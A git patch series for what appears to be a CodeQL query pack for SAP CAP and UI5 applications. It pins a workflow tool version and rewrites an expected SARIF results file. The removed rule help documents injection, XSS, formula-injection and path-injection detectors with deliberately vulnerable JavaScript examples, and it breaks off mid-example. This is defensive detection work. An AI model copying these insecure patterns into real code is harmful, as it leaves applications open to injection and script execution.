From 2e52b660f4d8bf8592e66f12f45084427d2a8356 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 16:22:31 +0200 Subject: [PATCH 01/15] Fixed codeql bundle version to 2.15.1 --- .github/workflows/code_scanning.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/code_scanning.yml b/.github/workflows/code_scanning.yml index f7f42e705..1eff49e99 100644 --- a/.github/workflows/code_scanning.yml +++ b/.github/workflows/code_scanning.yml @@ -61,6 +61,7 @@ jobs: with: languages: javascript config-file: ./.github/codeql/codeql-config.yaml + tools: https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.15.1/codeql-bundle-linux64.tar.gz debug: true - name: Perform CodeQL Analysis From cc7ebfaf28e67fda7289dd40a44ea8982501e7f8 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 16:24:42 +0200 Subject: [PATCH 02/15] Update javascript.sarif.expected --- .github/workflows/javascript.sarif.expected | 23938 +----------------- 1 file changed, 347 insertions(+), 23591 deletions(-) diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected index 619cca50c..b27b1ebbf 100644 --- a/.github/workflows/javascript.sarif.expected +++ b/.github/workflows/javascript.sarif.expected @@ -1,23596 +1,352 @@ { - "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", - "version" : "2.1.0", - "runs" : [ { - "tool" : { - "driver" : { - "name" : "CodeQL", - "organization" : "GitHub", - "semanticVersion" : "2.16.4", - "notifications" : [ { - "id" : "cli/expected-extracted-files/javascript", - "name" : "cli/expected-extracted-files/javascript", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "JavaScript" - } - }, { - "id" : "cli/expected-extracted-files/python", - "name" : "cli/expected-extracted-files/python", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "Python" - } - } ], - "rules" : [ ] - }, - "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.1.0+b1fbd510971da2b65671de1296cb2c3288f6b252", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.5.0+b1fbd510971da2b65671de1296cb2c3288f6b252", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = 